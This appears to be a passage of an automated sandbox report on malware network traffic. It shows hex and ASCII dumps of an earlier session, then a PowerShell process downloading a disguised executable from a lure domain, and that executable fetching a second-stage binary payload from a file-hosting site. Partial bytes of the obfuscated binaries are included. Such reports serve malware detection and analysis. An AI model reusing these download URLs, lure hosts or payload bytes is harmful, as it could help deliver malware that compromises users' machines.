                    2024-07-30 09:11:22 UTC1390INData Raw: 07 fd c2 fb 99 ed 3e aa 30 c0 18 ee 9b 13 52 31 ae 70 15 2d 19 3d a4 ed 05 49 c8 01 7e a8 cc bb 20 3d e4 e4 b8 39 64 1a da bc a1 9a d9 e5 96 be d5 a9 63 9b bc 96 7b 2d 45 54 44 87 b6 32 5b 97 6a a5 71 69 1f 17 cf 5f 51 57 1b a5 e4 b1 4a 49 eb cb 61 40 7a 10 1d 98 cc 38 90 7d e0 af b9 9e d3 ea a1 bd 18 63 a7 62 5a 36 c7 39 ce 66 00 d7 67 d7 9a 97 e6 95 b0 c4 f9 5e 72 6b 1b ac 4a 03 f6 f9 5a c1 9b de 1a 3b 4b b2 5c 02 ba 99 c7 54 54 b0 9e ac b5 d5 3f d3 5e 9c ce 1c d7 a2 b5 b8 c9 50 09 6e 4c eb 05 55 fa 5e 10 b8 ba 0a 98 aa 26 64 c6 27 48 0b 81 07 20 33 40 7a d0 1f ac 33 0e cc 1f 78 39 af b9 9e d3 ea a0 6d 12 e9 4e 97 18 db 60 12 3c 0a 82 c1 ac d2 76 82 a7 39 65 64 31 3a 57 1f 92 d6 eb 13 ee c9 01 c8 f9 5a c1 9b de 1a 3b 4b b2 5c 02 ba 99 c7 54 54 b0 9e ac
                    Data Ascii: >0R1p-=I~ =9dc{-ETD2[jqi_QWJIa@z8}cbZ69fg^rkJZ;K\TT?^PnLU^&d'H 3@z3x9mN`<v9ed1:WZ;K\TT
                    2024-07-30 09:11:22 UTC1072INData Raw: c7 9c 83 75 c6 6b 69 8e f9 6c 90 33 2a a8 c1 90 66 d1 ac 10 19 74 5f 96 3d b2 34 3d 84 39 a7 a8 85 fa 40 11 11 00 45 f9 7b 83 1a e7 1e a6 8c ca 87 71 3e 98 6c 58 6e b4 51 54 cf 1b 64 d6 c8 82 46 63 dc 80 99 11 68 98 77 1f 59 6f f4 c2 a2 1a 98 b5 72 cc 90 f1 b1 6d 0c bc db 64 39 32 aa 22 7f 68 20 32 68 b4 cb ee 2f a0 b4 16 87 4c c2 5c 72 19 3b ad 77 ad f8 9e db 57 4e c9 9f 53 1b 35 86 60 17 6d 40 6c a8 b1 ed ba db dc 33 6d 54 44 7e d8 5c 8c b8 51 c8 75 59 3c 6e 3f 43 81 40 77 11 01 04 66 36 82 88 02 22 20 08 b0 d7 9b cd 35 9a 9c d4 54 38 35 83 69 27 a9 6b 6c d2 05 95 d4 52 56 72 98 b5 63 69 2e f9 43 66 48 0d f5 14 43 67 d2 a5 aa ed 5c 69 61 9d 84 35 c4 13 ac 32 d8 a4 78 ef 96 c7 e4 05 5c 5a c4 75 6b 04 06 5d 17 43 9c e8 3c cc 5b e1 76 22 a9 82 6f c9 48 d7
                    Data Ascii: ukil3*ft_=4=9@E{q>lXnQTdFchwYormd92"h 2h/L\r;wWNS5`m@l3mTD~\QuY<n?C@wf6" 5T85i'klRVrci.CfHCg\ia52x\Zuk]C<[v"oH
                    2024-07-30 09:11:22 UTC1390INData Raw: c9 a2 7b 9e 21 af 15 54 61 ce 05 f9 96 f5 ff 00 5d 6b 7a d1 0e 8d 23 b1 d0 b3 9c a9 5a 66 68 f9 cf 60 25 01 d8 d0 d6 10 ad b4 53 9a ba b6 b9 8f 94 eb ea b8 11 f4 a9 bb 10 17 36 d3 58 5b 9e 62 22 76 7d 45 65 21 82 28 18 19 13 03 1a 06 40 01 92 e3 ab a7 6d 55 3c b4 ee f9 b2 30 b4 a0 3c 8b c7 58 82 dc 31 dc f4 97 16 f1 a4 d4 96 b5 af 19 8e b5 9b bb be c5 4d 68 7d 4c 94 11 b6 21 16 b3 5d a8 06 5b 14 bd a5 7e 0f 55 37 0c 46 2f b6 e8 dc e7 71 bc 61 00 6d eb 5a bd cf 45 98 9a e9 6c 6d ad d4 6e 6b 4b 78 b2 e0 d3 b3 dc 80 fc 70 6f bd c3 5f 7f 7c 74 59 b6 06 bf 20 06 c6 f5 af 44 ef 8e 70 b2 d4 b9 b9 eb 0a 7c f3 1f b2 ab 1e 81 f4 24 30 43 4d 5d 4b 48 99 e7 5c e6 15 af aa a6 6d 4d 34 94 ce f9 af 66 a7 c3 24 07 91 d8 e6 fd 6c 18 e2 ae 9a e6 38 df ef 04 06 bc 66 3a d6
                    Data Ascii: {!Ta]kz#Zfh`%S6X[b"v}Ee!(@mU<0<X1Mh}L!][~U7F/qamZElmnkKxpo_|tY Dp|$0CM]KH\mM4f$l8f:
                    2024-07-30 09:11:22 UTC1390INData Raw: 60 d6 a7 20 8c 86 79 20 25 3d 1a 09 1b 85 ed fc 6b cb df c9 db 9b 8f 5f 52 90 96 bd 86 ad 4e b3 db 61 a3 27 3e 2d 81 83 fd 96 c2 80 22 22 03 af 56 48 a6 9c 8e b1 11 cb d1 79 55 a7 2e 78 ae c6 af a5 a4 13 38 19 08 1a a0 fb ca f5 6a 46 09 18 f6 1e a7 37 54 a8 6a e1 a2 9b 65 c2 fa 6e 93 c0 c7 bb 5f 5b 6b 73 40 79 77 70 c4 d8 9f 47 f4 46 4e 3a a2 27 96 eb 35 a4 90 b8 b0 d7 08 ec 53 74 d6 b7 cb 3c e0 92 5b ae 49 19 f5 fb d5 ff 00 d2 5f 07 da 1c 58 1a 22 8c 34 65 aa 43 5b 90 55 b7 10 f0 69 87 09 50 4d 51 49 4e e7 54 64 75 4b 1b b7 34 04 1d 73 d3 ee 2a c3 f5 6f 8d b5 93 4d ae 33 00 38 bb de a4 fd 0f 69 93 18 62 2c 43 4f c6 be a1 d1 3e 41 98 39 e4 01 ff 00 fa b0 38 17 83 dd d3 13 de 65 92 ed 4f 21 84 1d 9c 63 4f 6f d2 ae 7e 8f 74 03 47 84 ab e3 9d 90 80 d6 64 47
                    Data Ascii: ` y %=k_RNa'>-""VHyU.x8jF7Tjen_[ks@ywpGFN:'5St<[I_X"4eC[UiPMQINTduK4s*oM38ib,CO>A98eO!cOo~tGdG
                    2024-07-30 09:11:22 UTC1316INData Raw: 16 6a 81 cf 7d 24 0e 7e 7a ce 8c 13 9e c5 db 5f 96 34 31 ad 68 d8 1a 32 0b f4 80 22 22 02 3c d2 4d ae 4b 8e 1d ac 10 97 09 1b 09 23 2f a9 79 71 78 c7 f7 ab 5d d2 b3 0a f1 93 6b 3e 63 1b 76 9f 79 c9 7b 05 57 4e da aa 79 60 78 05 b2 30 b4 83 d5 b5 55 4b d7 07 3b 55 cf 15 1b e9 8c 02 65 e3 0e 4d fa 50 14 2e bb 1d 5f 30 3b 0c ec e3 8c b2 b7 5b 32 0e 63 de ba 76 bd 3a 63 aa b9 0d 54 32 54 f1 6d 39 b9 bb 57 a0 98 97 83 a5 9e f8 c6 b5 f0 b4 ea b3 50 64 02 d7 ac 5c 1a 2d b6 d1 34 26 00 63 78 c8 66 c0 47 d9 f4 a0 29 0d 5f 09 dc 59 4d 55 0d 3b 8d 46 79 86 bf 3c d7 a0 fc 1f 71 9d d7 17 5b 22 ad ad 32 1e 31 a0 9d 6c ca 8f eb 78 25 d8 ea aa 9d 50 69 99 99 7e b0 c9 bf 4a b3 5a 37 c0 34 98 1e d8 ca 2a 76 06 86 37 2e ac 90 12 6a 22 20 08 46 60 83 ef 19 22 20 29 ef 09 7b
                    Data Ascii: j}$~z_41h2""<MK#/yqx]k>cvy{WNy`x0UK;UeMP._0;[2cv:cT2Tm9WPd\-4&cxfG)_YMU;Fy<q["21lx%Pi~JZ74*v7.j" F`" ){
                    2024-07-30 09:11:22 UTC1390INData Raw: 57 69 f8 fd c9 ec 5d 57 69 f8 fd c8 0d 6f 8c 67 78 27 18 ce f0 5b 27 b1 75 5d a7 e3 f7 27 b1 75 5d a7 e3 f7 20 35 ad 78 fa f3 6e 7d ab ef 18 ce f0 5b 27 b1 75 5d a7 e3 f7 27 b1 75 5d a7 e3 f7 20 35 be 31 9d e0 9c 63 3b c1 6c 9e c5 d5 76 9f 8f dc 9e c5 d5 76 9f 8f dc 80 d6 f8 c6 77 82 71 8c ef 05 b2 7b 17 55 da 7e 3f 72 7b 17 55 da 7e 3f 72 03 5b e3 19 de 09 c6 33 bc 16 c9 ec 5d 57 69 f8 fd c9 ec 5d 57 69 f8 fd c8 0d 6f 8c 67 78 27 18 ce f0 5b 27 b1 75 5d a7 e3 f7 27 b1 75 5d a7 e3 f7 20 35 be 31 9d e0 9c 63 3b c1 6c 9e c5 d5 76 9f 8f dc 9e c5 d5 76 9f 8f dc 80 d6 f8 c6 77 82 71 8c ef 05 b2 7b 17 55 da 7e 3f 72 7b 17 55 da 7e 3f 72 03 5b e3 19 de 09 c6 33 bc 16 c9 ec 5d 57 69 f8 fd c9 ec 5d 57 69 f8 fd c8 0d 6f 8c 67 78 2e 1a 89 3f 13 27 16 e1 af aa 72 5b
                    Data Ascii: Wi]Wiogx'['u]'u] 5xn}['u]'u] 51c;lvvwq{U~?r{U~?r[3]Wi]Wiogx'['u]'u] 51c;lvvwq{U~?r{U~?r[3]Wi]Wiogx.?'r[


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.74970534.117.33.2334437864C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    TimestampBytes transferredDirectionData
                    2024-07-30 09:11:24 UTC206OUTGET /CoinAIfdp.exe HTTP/1.1
                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                    Host: secured-order-download-businessportal.replit.app
                    Connection: Keep-Alive
                    2024-07-30 09:11:24 UTC253INHTTP/1.1 200 OK
                    Content-Length: 402432
                    Content-Type:
                    Strict-Transport-Security: max-age=63072000; includeSubDomains
                    Date: Tue, 30 Jul 2024 09:11:24 GMT
                    Via: 1.1 google
                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                    Connection: close
                    2024-07-30 09:11:24 UTC1390INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f4 0d 8e f6 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 30 00 00 1a 06 00 00 08 00 00 00 00 00 00 fe 37 06 00 00 20 00 00 00 40 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 06 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL.07 @@ `
                    2024-07-30 09:11:24 UTC1390INData Raw: ff ff ff 11 05 20 30 1d 4d ed 20 04 00 00 00 63 20 fa 71 d6 a1 61 7e e6 01 00 04 7b 19 02 00 04 61 28 5e 00 00 06 7e 31 02 00 04 28 77 05 00 06 13 06 20 08 00 00 00 38 d8 fe ff ff 20 60 ea 00 00 7e 2d 02 00 04 28 67 05 00 06 20 00 00 00 00 7e e6 01 00 04 7b ec 01 00 04 3a b5 fe ff ff 26 20 00 00 00 00 38 aa fe ff ff 38 5d 00 00 00 20 0b 00 00 00 7e e6 01 00 04 7b c6 01 00 04 3a 91 fe ff ff 26 20 02 00 00 00 38 86 fe ff ff 00 11 06 11 07 11 04 28 0d 00 00 06 20 0e 00 00 00 38 70 fe ff ff 11 0c 3a e3 ff ff ff 20 03 00 00 00 7e e6 01 00 04 7b b6 01 00 04 3a 55 fe ff ff 26 20 03 00 00 00 38 4a fe ff ff 00 00 11 08 28 0f 00 00 06 20 14 00 00 00 38 37 fe ff ff 7e 33 02 00 04 28 7f 05 00 06 11 0a 7e 34 02 00 04 28 83 05 00 06 13 0b 20 0f 00 00 00 7e e6 01 00 04
                    Data Ascii: 0M c qa~{a(^~1(w 8 `~-(g ~{:& 88] ~{:& 8( 8p: ~{:U& 8J( 87~3(~4( ~
                    2024-07-30 09:11:24 UTC1156INData Raw: 86 ff ff ff 26 20 01 00 00 00 38 7b ff ff ff 00 00 20 00 00 00 00 7e e6 01 00 04 7b 07 02 00 04 39 0f 00 00 00 26 20 00 00 00 00 38 04 00 00 00 fe 0c 06 00 45 02 00 00 00 05 00 00 00 05 01 00 00 38 00 00 00 00 00 00 11 01 02 03 7e 3b 02 00 04 28 9f 05 00 06 20 00 00 00 00 7e e6 01 00 04 7b c2 01 00 04 3a 0f 00 00 00 26 20 00 00 00 00 38 04 00 00 00 fe 0c 05 00 45 01 00 00 00 05 00 00 00 38 00 00 00 00 00 00 dd b8 00 00 00 13 03 20 00 00 00 00 7e e6 01 00 04 7b d6 01 00 04 39 0f 00 00 00 26 20 00 00 00 00 38 04 00 00 00 fe 0c 02 00 45 02 00 00 00 05 00 00 00 60 00 00 00 38 00 00 00 00 00 20 f3 97 b0 6a 20 61 39 97 2e 61 7e e6 01 00 04 7b d4 01 00 04 61 28 17 00 00 06 11 03 7e 3c 02 00 04 28 a3 05 00 06 7e 39 02 00 04 28 97 05 00 06 7e 3a 02 00 04 28 9b 05
                    Data Ascii: & 8{ ~{9& 8E8~;( ~{:& 8E8 ~{9& 8E`8 j a9.a~{a(~<(~9(~:(
                    2024-07-30 09:11:24 UTC1390INData Raw: 0c 03 00 45 01 00 00 00 05 00 00 00 38 00 00 00 00 00 00 dd 88 00 00 00 11 0d 39 61 00 00 00 20 00 00 00 00 7e e6 01 00 04 7b b7 01 00 04 3a 0f 00 00 00 26 20 00 00 00 00 38 04 00 00 00 fe 0c 04 00 45 02 00 00 00 05 00 00 00 30 00 00 00 38 00 00 00 00 11 0d 7e 38 02 00 04 28 93 05 00 06 20 00 00 00 00 7e e6 01 00 04 7b 04 02 00 04 3a ce ff ff ff 26 20 01 00 00 00 38 c3 ff ff ff 00 dc 20 00 00 00 00 7e e6 01 00 04 7b c9 01 00 04 3a 29 ff ff ff 26 20 00 00 00 00 38 1e ff ff ff dd 88 00 00 00 11 08 39 61 00 00 00 20 00 00 00 00 7e e6 01 00 04 7b da 01 00 04 3a 0f 00 00 00 26 20 00 00 00 00 38 04 00 00 00 fe 0c 09 00 45 02 00 00 00 05 00 00 00 30 00 00 00 38 00 00 00 00 11 08 7e 38 02 00 04 28 93 05 00 06 20 01 00 00 00 7e e6 01 00 04 7b af 01 00 04 3a ce ff
                    Data Ascii: E89a ~{:& 8E08~8( ~{:& 8 ~{:)& 89a ~{:& 8E08~8( ~{:
                    2024-07-30 09:11:24 UTC1390INData Raw: 00 00 00 00 dd 9b 00 00 00 11 0b 3a 5d 00 00 00 20 00 00 00 00 7e e6 01 00 04 7b fc 01 00 04 3a 0f 00 00 00 26 20 00 00 00 00 38 04 00 00 00 fe 0c 0e 00 45 03 00 00 00 05 00 00 00 29 00 00 00 3f 00 00 00 38 00 00 00 00 38 36 00 00 00 20 00 00 00 00 7e e6 01 00 04 7b a9 01 00 04 3a d1 ff ff ff 26 20 01 00 00 00 38 c6 ff ff ff 11 0b 7e 38 02 00 04 28 93 05 00 06 20 02 00 00 00 38 b0 ff ff ff 00 dc 20 01 00 00 00 7e e6 01 00 04 7b fe 01 00 04 39 16 ff ff ff 26 20 01 00 00 00 38 0b ff ff ff dd 9b 00 00 00 11 07 3a 24 00 00 00 20 02 00 00 00 38 04 00 00 00 fe 0c 01 00 45 03 00 00 00 05 00 00 00 54 00 00 00 30 00 00 00 38 00 00 00 00 11 07 7e 38 02 00 04 28 93 05 00 06 20 01 00 00 00 7e e6 01 00 04 7b f2 01 00 04 39 ca ff ff ff 26 20 01 00 00 00 38 bf ff ff ff
                    Data Ascii: :] ~{:& 8E)?886 ~{:& 8~8( 8 ~{9& 8:$ 8ET08~8( ~{9& 8
                    2024-07-30 09:11:24 UTC1316INData Raw: 28 00 00 00 11 07 6f 1a 00 00 0a 13 01 20 01 00 00 00 7e e6 01 00 04 7b e5 01 00 04 39 b5 ff ff ff 26 20 01 00 00 00 38 aa ff ff ff 00 38 2a 00 00 00 20 03 00 00 00 38 04 00 00 00 fe 0c 0c 00 45 04 00 00 00 af 00 00 00 5f 00 00 00 05 00 00 00 37 00 00 00 38 aa 00 00 00 00 00 11 05 7e 4c 02 00 04 28 e3 05 00 06 3a 1f 00 00 00 20 00 00 00 00 7e e6 01 00 04 7b b1 01 00 04 3a bf ff ff ff 26 20 00 00 00 00 38 b4 ff ff ff 11 05 6f 1b 00 00 0a 13 08 20 01 00 00 00 7e e6 01 00 04 7b ce 01 00 04 39 97 ff ff ff 26 20 00 00 00 00 38 8c ff ff ff 00 20 3d 8d 70 42 20 b9 9d 66 71 61 7e e6 01 00 04 7b e9 01 00 04 61 28 17 00 00 06 11 08 7e 50 02 00 04 28 f3 05 00 06 7e 3c 02 00 04 28 a3 05 00 06 7e 39 02 00 04 28 97 05 00 06 7e 3a 02 00 04 28 9b 05 00 06 20 02 00 00 00
                    Data Ascii: (o ~{9& 88* 8E_78~L(: ~{:& 8o ~{9& 8 =pB fqa~{a(~P(~<(~9(~:(
                    2024-07-30 09:11:24 UTC1390INData Raw: 04 28 6f 05 00 06 20 02 00 00 00 7e e6 01 00 04 7b 0b 02 00 04 39 c8 ff ff ff 26 20 01 00 00 00 38 bd ff ff ff 00 17 13 03 20 01 00 00 00 7e e6 01 00 04 7b a9 01 00 04 39 a5 ff ff ff 26 20 01 00 00 00 38 9a ff ff ff dd 3f ff ff ff 13 02 20 02 00 00 00 38 04 00 00 00 fe 0c 01 00 45 03 00 00 00 05 00 00 00 83 00 00 00 28 00 00 00 38 00 00 00 00 00 16 13 03 20 01 00 00 00 7e e6 01 00 04 7b 02 02 00 04 3a d2 ff ff ff 26 20 01 00 00 00 38 c7 ff ff ff 00 20 f0 dc 53 45 20 7d 95 31 54 61 7e e6 01 00 04 7b b3 01 00 04 61 28 17 00 00 06 11 02 7e 3c 02 00 04 28 a3 05 00 06 7e 39 02 00 04 28 97 05 00 06 7e 3a 02 00 04 28 9b 05 00 06 20 00 00 00 00 7e e6 01 00 04 7b 07 02 00 04 3a 77 ff ff ff 26 20 00 00 00 00 38 6c ff ff ff dd 96 fe ff ff 20 02 00 00 00 7e e6 01 00
                    Data Ascii: (o ~{9& 8 ~{9& 8? 8E(8 ~{:& 8 SE }1Ta~{a(~<(~9(~:( ~{:w& 8l ~
                    2024-07-30 09:11:24 UTC1390INData Raw: 04 7b fd 01 00 04 3a 0f 00 00 00 26 20 00 00 00 00 38 04 00 00 00 fe 0c 0e 00 45 03 00 00 00 05 00 00 00 3f 00 00 00 14 00 00 00 38 00 00 00 00 38 36 00 00 00 20 02 00 00 00 38 db ff ff ff 11 0c 7e 38 02 00 04 28 93 05 00 06 20 01 00 00 00 7e e6 01 00 04 7b e1 01 00 04 3a bb ff ff ff 26 20 01 00 00 00 38 b0 ff ff ff 00 dc 13 08 20 01 00 00 00 7e e6 01 00 04 7b e7 01 00 04 39 0f 00 00 00 26 20 02 00 00 00 38 04 00 00 00 fe 0c 07 00 45 03 00 00 00 05 00 00 00 83 00 00 00 28 00 00 00 38 00 00 00 00 00 16 13 06 20 01 00 00 00 7e e6 01 00 04 7b 06 02 00 04 3a d2 ff ff ff 26 20 01 00 00 00 38 c7 ff ff ff 00 20 8b 34 4f cb 20 12 39 5f 9d 61 7e e6 01 00 04 7b ab 01 00 04 61 28 17 00 00 06 11 08 7e 3c 02 00 04 28 a3 05 00 06 7e 39 02 00 04 28 97 05 00 06 7e 3a 02
                    Data Ascii: {:& 8E?886 8~8( ~{:& 8 ~{9& 8E(8 ~{:& 8 4O 9_a~{a(~<(~9(~:
                    2024-07-30 09:11:24 UTC1316INData Raw: ef 00 00 72 3d 00 00 87 c1 00 00 48 36 00 00 22 53 00 00 99 6b 00 00 16 51 00 00 a7 dc 00 00 0f 22 00 00 e9 63 00 00 65 7b 00 00 bc ca 00 00 c8 cc 00 00 e3 16 00 00 d7 20 00 00 64 ce 00 00 87 5f 00 00 e6 0b 01 00 f7 a5 00 00 85 1a 00 00 23 a7 00 00 65 6a 00 00 fe 7d 00 00 31 05 00 00 13 a6 00 00 1f fc 00 00 04 38 00 00 98 61 00 00 0e 79 00 00 df a7 00 00 1f d4 00 00 95 87 00 00 f7 00 00 00 24 0b 01 00 c0 9e 00 00 da 0e 01 00 e2 00 00 00 0e 87 00 00 c3 ae 00 00 0c a5 00 00 f0 82 00 00 db 06 01 00 49 b3 00 00 fb c2 00 00 2b 97 00 00 36 83 00 00 92 58 00 00 5a 56 00 00 9f 75 00 00 f4 ae 00 00 3e 03 00 00 40 17 01 00 b5 e0 00 00 c3 3d 00 00 e7 8e 00 00 fc 33 00 00 29 c4 00 00 93 43 00 00 28 8c 00 00 d2 56 00 00 31 bc 00 00 d2 5f 00 00 fd be 00 00 05 1c 00 00
                    Data Ascii: r=H6"SkQ"ce{ d_#ej}18ay$I+6XZVu>@=3)C(V1_
                    2024-07-30 09:11:24 UTC1390INData Raw: bb 00 00 0c 78 00 00 28 38 00 00 fc e7 00 00 64 76 00 00 d6 d9 00 00 6b d3 00 00 36 26 00 00 7e 07 01 00 3c aa 00 00 50 01 01 00 64 41 00 00 f9 a1 00 00 45 a5 00 00 81 9e 00 00 e1 bc 00 00 94 0c 01 00 1d 30 00 00 0f 2f 00 00 a9 9f 00 00 b9 fc 00 00 cc 70 00 00 10 17 01 00 f4 04 01 00 8f 8e 00 00 3c b9 00 00 eb 01 00 00 02 77 00 00 69 d0 00 00 5d f0 00 00 ee 0d 00 00 9c c1 00 00 cd 2c 00 00 60 4e 00 00 f3 55 00 00 38 73 00 00 97 0f 01 00 92 73 00 00 ba f8 00 00 12 07 01 00 3b 00 00 00 04 0a 01 00 05 95 00 00 7e e5 00 00 9e 40 00 00 1a df 00 00 6e 31 00 00 b0 e3 00 00 c7 7f 00 00 66 dd 00 00 03 b9 00 00 4b df 00 00 08 16 01 00 05 08 00 00 68 98 00 00 76 52 00 00 b9 0a 01 00 54 9c 00 00 9e 8d 00 00 b3 b5 00 00 05 96 00 00 2a af 00 00 6d 27 00 00 e2 32 00 00
                    Data Ascii: x(8dvk6&~<PdAE0/p<wi],`NU8ss;~@n1fKhvRT*m'2


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    2192.168.2.749706194.15.112.2484438008C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe
                    TimestampBytes transferredDirectionData
                    2024-07-30 09:11:28 UTC70OUTGET /qNzy/OfCN.bin HTTP/1.1
                    Host: oshi.at
                    Connection: Keep-Alive
                    2024-07-30 09:11:29 UTC315INHTTP/1.1 200 OK
                    Server: nginx
                    Date: Tue, 30 Jul 2024 09:11:29 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 77269
                    Connection: close
                    ETag: "18f7ad42456cdee3fee6ee9b5d45b065"
                    Last-Modified: Sat, 20 Jul 2024 16:05:39 GMT
                    Content-Disposition: attachment; filename=OfCN.bin
                    Accept-Ranges: bytes
                    2024-07-30 09:11:29 UTC3768INData Raw: e8 c0 cb 00 00 c0 cb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 52 d2 55 f6 a3 22 83 f7 9a 15 70 5a 2f 9a 5f 79 df c1 77 0f 2e ec ec 6a 83 03 2a 8e 2e 62 52 c4 bc 7b 87 83 94 f9 a0 76 f7 52 bd bb de b3 a6 f4 16 3e e8 18 63 20 e0 ef 7d 07 01 7e 7c 40 29 8f cc d6 a8 85 66 d4 b2 e5 97 91 ad b2 af 28 3d 0b 41 fb af 1a 65 5f c4 33 79 d1 d7 63 8a 8d a8 5e 55 44 bf 16 5e 57 6f bc 96 82 13 bf f9 cf 04 e4 9c c1 72 36 c1 bb ed 9c 18 cc be b1 47 24 6a f9 92 a4 60 1a ba fa e6 00 22 29 08 aa d0 e2 e6 3d 6e a8 7f f5 f9 7c 1c 08 79 7a b7 81 ec 5c a8 31 e3 d2 5e 79 bd 9e 1e 9b 41 6b 44 a1 18 a2 53 bd cb 08 51 89 4f 24 33 a8 1d ab b7 6b d5 7d 80 87 5f cc f4 8c 6c 49 95 21 8a
                    Data Ascii: RU"pZ/_yw.j*.bR{vR>c }~|@)f(=Ae_3yc^UD^Wor6G$j`")=n|yz\1^yAkDSQO$3k}_lI!
                    2024-07-30 09:11:29 UTC4096INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Data Ascii:
                    2024-07-30 09:11:29 UTC4096INData Raw: 52 00 00 00 06 28 29 00 00 0a 0c 16 0d 38 39 00 00 00 08 09 a3 32 00 00 01 13 04 28 06 00 00 06 11 04 07 6f 2a 00 00 0a 28 06 00 00 06 6f 2b 00 00 0a 39 05 00 00 00 dd c3 00 00 00 dd 06 00 00 00 26 dd 00 00 00 00 09 17 58 0d 09 08 8e 69 32 c1 38 a9 00 00 00 28 06 00 00 06 06 07 6f 2c 00 00 0a 38 98 00 00 00 73 2d 00 00 0a 13 05 72 22 21 00 70 72 22 21 00 70 73 2e 00 00 0a 13 06 11 05 11 06 6f 2f 00 00 0a 11 05 7e 0e 00 00 04 6f 30 00 00 0a 17 8d 38 00 00 01 25 16 72 24 21 00 70 a2 16 6f 31 00 00 0a 13 07 11 07 16 a3 38 00 00 01 80 02 00 00 04 11 07 73 27 00 00 0a 17 11 07 8e 69 6f 32 00 00 0a a3 38 00 00 01 80 01 00 00 04 28 06 00 00 06 7e 02 00 00 04 7e 01 00 00 04 28 15 00 00 0a 6f 2c 00 00 0a dd 0f 00 00 00 11 05 39 07 00 00 00 11 05 6f 33 00 00 0a dc
                    Data Ascii: R()892(o*(o+9&Xi28(o,8s-r"!pr"!ps.o/~o08%r$!po18s'io28(~~(o,9o3
                    2024-07-30 09:11:29 UTC4096INData Raw: 28 a6 00 00 0a 13 04 dd 1a 00 00 00 06 39 06 00 00 00 06 6f 33 00 00 0a dc 26 72 66 25 00 70 13 04 dd 00 00 00 00 11 04 2a 01 28 00 00 02 00 31 00 2f 60 00 0d 00 00 00 00 02 00 1f 00 7c 9b 00 0d 00 00 00 00 00 00 00 00 a8 a8 00 0d 01 00 00 01 13 30 02 00 39 00 00 00 0f 00 00 11 28 a7 00 00 0a 0a 16 0b 38 24 00 00 00 06 07 a3 0a 00 00 01 0c 08 6f a8 00 00 0a 02 6f a9 00 00 0a 28 aa 00 00 0a 39 02 00 00 00 08 2a 07 17 58 0b 07 06 8e 69 32 d6 14 2a 00 00 00 1b 30 01 00 17 00 00 00 00 00 00 00 20 03 00 00 80 28 3c 00 00 06 26 dd 06 00 00 00 26 dd 00 00 00 00 2a 00 01 10 00 00 00 00 00 00 10 10 00 06 01 00 00 01 1b 30 03 00 40 00 00 00 10 00 00 11 20 00 01 00 00 73 ab 00 00 0a 0a 28 38 00 00 06 06 20 00 01 00 00 28 39 00 00 06 16 3e 0c 00 00 00 06 6f 38 00 00
                    Data Ascii: (9o3&rf%p*(1/`|09(8$oo(9*Xi2*0 (<&&*0@ s(8 (9>o8
                    2024-07-30 09:11:29 UTC4096INData Raw: 6a 2a 00 00 00 13 30 02 00 87 00 00 00 20 00 00 11 02 7b 36 00 00 04 0a 06 1a 59 45 07 00 00 00 16 00 00 00 05 00 00 00 52 00 00 00 52 00 00 00 27 00 00 00 33 00 00 00 40 00 00 00 38 4d 00 00 00 02 7b 35 00 00 04 a5 68 00 00 01 28 fb 00 00 0a 2a 02 7b 35 00 00 04 74 38 00 00 01 28 fc 00 00 0a 2a 02 7b 35 00 00 04 a5 96 00 00 01 2a 02 7b 35 00 00 04 a5 97 00 00 01 6c 2a 02 7b 35 00 00 04 a5 6b 00 00 01 28 fa 00 00 0a 6c 2a 23 00 00 00 00 00 00 00 00 2a 00 13 30 02 00 a4 00 00 00 21 00 00 11 02 7b 36 00 00 04 0a 06 1a 59 45 08 00 00 00 16 00 00 00 05 00 00 00 6e 00 00 00 6e 00 00 00 27 00 00 00 38 00 00 00 49 00 00 00 62 00 00 00 38 69 00 00 00 02 7b 35 00 00 04 a5 68 00 00 01 28 e7 00 00 0a 2a 02 7b 35 00 00 04 6f 38 00 00 0a 28 54 00 00 06 2a 02 7b 35 00
                    Data Ascii: j*0 {6YERR'3@8M{5h(*{5t8(*{5*{5l*{5k(l*#*0!{6YEnn'8Ib8i{5h(*{5o8(T*{5
